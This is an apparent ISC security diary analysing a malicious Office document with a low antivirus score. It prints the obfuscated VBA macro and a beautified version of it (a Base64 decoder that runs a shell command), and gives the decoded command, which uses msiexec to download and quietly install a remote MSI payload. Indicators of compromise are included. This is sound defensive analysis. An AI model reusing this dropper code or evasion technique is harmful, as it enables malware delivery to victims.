For a while, ISC handlers have demonstrated several obfuscation techniques via our diaries. We always told you that attackers are trying to find new techniques to hide their content to not be flagged as malicious by antivirus products. Such of them are quite complex. And sometimes, we find documents that have a very low score on VT. Here is a sample that I found (SHA256: bac1a6c238c4d064f8be9835a05ad60765bcde18644c847b0c4284c404e38810). It gets a score of 6/59 which is not bad (from an attacker perspective). Is it a targeted attack? A new “APT” (buzzword!), not really…
The sample gets my attention because it was flagged as malicious by only 6 antivirus products and none from the top players. When you open it, you see a classic warning message:
The goal is to make the victim execute the VBS macro attached to the document. Just go to the ‘Macro’ menu and open the macro called ‘TYpZVAnvPqNdqkDfBqeG’. The macro is of course obfuscated but it’s very easy to read the code. Just garbage code has been added with never-reached condition blocks and dummy variables:
Dim RSngVushPknGEPaVHjxjeSnJFJQjylGoIAcYFPErxtqoWOecXBdAw As Boolean If 30 = 33 Then Dim qEzfeaMeJjeeyyDmBQreGmlbymqeoLxIFsSwdtbos As Byte Dim MnKMKYQbpWllWqESXgrkhqylVYGgGJIpDm As Date End If Dim tybPoOaDypMWiCNeFMjEKWpYqlRkUfNwikwGqIs As Boolean If 44 = 37 Then Dim dKdrJZzpEScEvFybWICZCwpjTbQoyFHnxUFugfgzrvNRsbSqjJaxoipgUu As Byte Dim YhJKrzLoGbzEurbDhHjXqrJZEpeJzOeZamGyqgDOGDUqqfOiWkAixwDgYjG As Date End If
I beautified the code for easier reading:
Dim string1 As String Dim string2 As String # Base64 Decode Function Function func1(arg1) string2 = "Msxml2." & "DOMDocument" Dim object1 Dim var4 Set object1 = CreateObject(string2) string1 = bin.base64 Set var4 = object1.createElement("ipKHiUOXckoBg") var4.DataType = string1 var4.Text = arg1 func1 = var4.NodeTypedValue End Function Sub main() On Error Resume Next i = 0 var1 = "WSCript.shell" Dim var2 Set var2 = CreateObject(var1) var3 =func1("bQBzAGkAZQB4AGUAYwAuAGUAeABlACAALwBpACAAaAB0AHQAcAA6AC [...] gAC8AcQB1AGkAZQB0AA==") var2.Run var3, i End Sub
The function ‘func1’ is just a Base64 decoder and the Base64 string is decoded to:
msiexec.exe /i hxxp://nunovidente[.]pt/_output6fd4680.msi /quiet
You can see that, like most Microsoft tools, msiexec.exe accepts an URL as a filename to automatically download it before the installation. From the msiexec.exe syntax help:
</package | /i> <Product.msi> : Installs or configures a product
Since I found the document, the payload has been removed. It was not available on VT (SHA256: 51b53eaa4fe6790b60bd2a88b934baa3de841462513904f9c8bd048414f6eece). The MSI file installs a malicious binary (SHA256: aa3fec1cbd6d6395c20d0ae1b42879b28bbe1b451625174d38d49e30b13ed455) which communicates with hxxp://mountaintopbuilders[.]com/wp-admin/user/five/fre.php. Hopefully, this one has a better detection score.
This demonstrates that running a classic antivirus is mandatory but remains a weak protection. They can be easily evaded with simple obfuscation. If you’re interested in MSI files analysis, Didier wrote a diary on this topic.
Xavier Mertens (@xme)
May 25th 2018
7 months ago